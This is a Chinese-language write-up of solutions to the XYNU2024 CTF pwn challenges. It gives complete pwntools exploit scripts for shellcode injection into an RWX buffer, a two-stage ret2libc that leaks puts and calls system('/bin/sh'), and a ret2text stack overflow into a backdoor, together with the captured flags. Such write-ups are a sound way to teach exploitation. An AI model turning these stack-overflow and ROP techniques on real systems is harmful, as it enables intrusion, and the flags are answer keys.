XYNU2024信安杯
NC
用 nc 连上即可直接拿到 flag
XYNUCTF{435fa9df-4c7e-4b21-b508-3c4faa7e76c9}
Shellcode
检查保护
查看主函数发现存在mmap函数,此处的mmap将buf段0x400大小的内存区权限改为可读可写可执行
可以通过read函数向buf读入shellcode后执行。
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*
#========================
context.arch = 'amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

# remote instance and the name of the local copy of the challenge binary
host, port = 'gz.imxbt.cn', 20706
file_name = 'shellcode'

# breakpoint addresses consumed by Start() when run with the G / GP flags
Breakpoint_NoPIE = 0x1100
Breakpoint_PIE = 0x1100
#========================

local_file = f'/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/{file_name}'
elf = ELF(local_file)
local_libc = elf.libc.path                 # libc pwntools resolves for the local binary
libc = ELF(local_libc, checksec=False)
def Start():
    """Open the target tube according to pwntools' command-line ``args``.

    C       -> run ROPgadget on the libc and exit (nothing is returned)
    G       -> local process with gdb attached, breakpoint at Breakpoint_NoPIE
    GP      -> local process with gdb attached, breakpoint at $rebase(Breakpoint_PIE)
    P       -> plain local process
    (none)  -> remote connection to host:port
    """
    if args.C:
        # NOTE(review): the other scripts on this page pass local_file here;
        # confirm which binary the gadget scan is meant to run against.
        ROPgadget(local_libc)
        exit(0)
    elif args.G or args.GP:
        io = process(local_file)
        bp = f'b *{Breakpoint_NoPIE}' if args.G else f'b *$rebase({Breakpoint_PIE})'
        gdb.attach(io, bp)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host, port)
    return io
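def Exp():
    """Send the shellcode payload over the module-level ``io`` opened by Start().

    ``io`` is a module global assigned in the ``__main__`` block; calling this
    function before Start() has run raises NameError.
    """
    # /bin/sh shellcode assembled for the arch configured in context (amd64).
    shellcode = asm(shellcraft.sh())
    # ljust only pads when the shellcode is shorter than 0x10 bytes; it never truncates.
    payload = shellcode.ljust((0x10), b'a')
    # Per the writeup, the buffer read here lives in an RWX region, so the
    # program jumps straight into these bytes after the read.
    io.sendlineafter(b'different!', payload)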
if __name__=='__main__':
    # Start() selects local / remote / gdb from the command-line args;
    # Exp() drives the module-level io it returns.
    io=Start()
    Exp()
    io.interactive()
# XYNUCTF{7aca466e-dd1c-4890-82d9-a016d41d35c1}
ret2libc
检查保护情况,64位只开了代码执行保护
在XYNU函数内发现read栈溢出,无后门函数,考虑ret2libc
查找所需 gadget 的地址
编写代码
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*
#========================
context.arch = 'amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

# remote instance and the name of the local copy of the challenge binary
host, port = 'gz.imxbt.cn', 20709
file_name = 'pwn'

# breakpoint addresses consumed by Start() when run with the G / GP flags
Breakpoint_NoPIE = 0x1100
Breakpoint_PIE = 0x1100
#========================

local_file = f'/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/{file_name}'
elf = ELF(local_file)
local_libc = elf.libc.path                 # libc pwntools resolves for the local binary
libc = ELF(local_libc, checksec=False)
def Start():
    """Open the target tube according to pwntools' command-line ``args``.

    C       -> run ROPgadget on the binary and exit (nothing is returned)
    G       -> local process with gdb attached, breakpoint at Breakpoint_NoPIE
    GP      -> local process with gdb attached, breakpoint at $rebase(Breakpoint_PIE)
    P       -> plain local process
    (none)  -> remote connection to host:port
    """
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.G or args.GP:
        io = process(local_file)
        bp = f'b *{Breakpoint_NoPIE}' if args.G else f'b *$rebase({Breakpoint_PIE})'
        gdb.attach(io, bp)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host, port)
    return io
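def Exp():
    """Two-stage ret2libc over the module-level ``io`` opened by Start().

    Stage 1 overflows the read() buffer in XYNU, calls puts(puts@got) to leak
    a libc address, and returns to main for a second overflow.  Stage 2 uses
    that leak to locate system() and "/bin/sh" in libc and calls system("/bin/sh").

    ``io`` is a module global assigned in the ``__main__`` block; calling this
    function before Start() has run raises NameError.
    """
    # Absolute addresses: the writeup states only NX is enabled, so the binary
    # is not PIE and these do not move between runs.
    ret_add = 0x000000000040101a    # lone `ret` gadget
    pop_rdi = 0x0000000000401209    # `pop rdi; ret` (per its name; verify with ROPgadget)
    main_add = 0x000000000040123C   # re-enter main for the second stage
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    print("Puts_got: ", hex(puts_got))
    print("Puts_plt: ", hex(puts_plt))

    # offset+8 reaches the saved return address (presumably 0x70 of buffer
    # plus the 8-byte saved rbp).
    offset = 0x70
    payload1 = b'a' * (offset + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)
    io.sendlineafter(b'ezret2libc', payload1)

    # A user-space libc pointer on x86-64 typically has 6 significant bytes and
    # ends in 0x7f; keep the 6 bytes up to that marker and zero-extend to 8 for u64().
    puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    print("Puts_addr: ", hex(puts_addr))
    # NOTE(review): offsets come from the LOCAL libc (elf.libc.path, set at
    # module level).  If the remote libc differs, system/"/bin/sh" are wrong;
    # LibcSearcher is imported but never used to handle that case.
    libc_base = puts_addr - libc.symbols['puts']
    system_add = libc_base + libc.symbols['system']
    bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

    # The extra `ret` is presumably there to keep rsp 16-byte aligned before
    # system() is entered; then system("/bin/sh").
    payload2 = b'a' * (offset + 8) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)
    io.sendlineafter(b'ezret2libc', payload2)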
if __name__=='__main__':
    # Start() selects local / remote / gdb from the command-line args;
    # Exp() drives the module-level io it returns.
    io=Start()
    Exp()
    io.interactive()
# XYNUCTF{dfecb249-67ec-42f5-bec0-a416044085c4}
ret2text
检查保护,64位只开了代码执行保护
检查程序,存在后门函数。主函数处gets存在栈溢出,编写代码
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*
#========================
context.arch = 'amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

# remote instance and the name of the local copy of the challenge binary
host, port = 'gz.imxbt.cn', 20728
file_name = 'pwn'

# breakpoint addresses consumed by Start() when run with the G / GP flags
Breakpoint_NoPIE = 0x1100
Breakpoint_PIE = 0x1100
#========================

local_file = f'/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/{file_name}'
elf = ELF(local_file)
local_libc = elf.libc.path                 # libc pwntools resolves for the local binary
libc = ELF(local_libc, checksec=False)
def Start():
    """Open the target tube according to pwntools' command-line ``args``.

    C       -> run ROPgadget on the binary and exit (nothing is returned)
    G       -> local process with gdb attached, breakpoint at Breakpoint_NoPIE
    GP      -> local process with gdb attached, breakpoint at $rebase(Breakpoint_PIE)
    P       -> plain local process
    (none)  -> remote connection to host:port
    """
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.G or args.GP:
        io = process(local_file)
        bp = f'b *{Breakpoint_NoPIE}' if args.G else f'b *$rebase({Breakpoint_PIE})'
        gdb.attach(io, bp)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host, port)
    return io
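def Exp():
    """Overflow the gets() buffer in main and return into the backdoor function.

    ``io`` is a module global assigned in the ``__main__`` block; calling this
    function before Start() has run raises NameError.
    """
    # Absolute address: the writeup states only NX is enabled, so no PIE.
    binsh_add = 0x0000000000401208
    # 0x8+8 reaches the saved return address (presumably an 8-byte buffer
    # plus the 8-byte saved rbp); the next qword is the new return address.
    payload = b'a' * (0x8 + 8) + p64(binsh_add)
    io.sendlineafter(b"overflow?", payload)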
if __name__=='__main__':
    # Start() selects local / remote / gdb from the command-line args;
    # Exp() drives the module-level io it returns.
    io=Start()
    Exp()
    io.interactive()
# XYNUCTF{385959a1-b1ac-41e3-b840-294a11d2bb7c}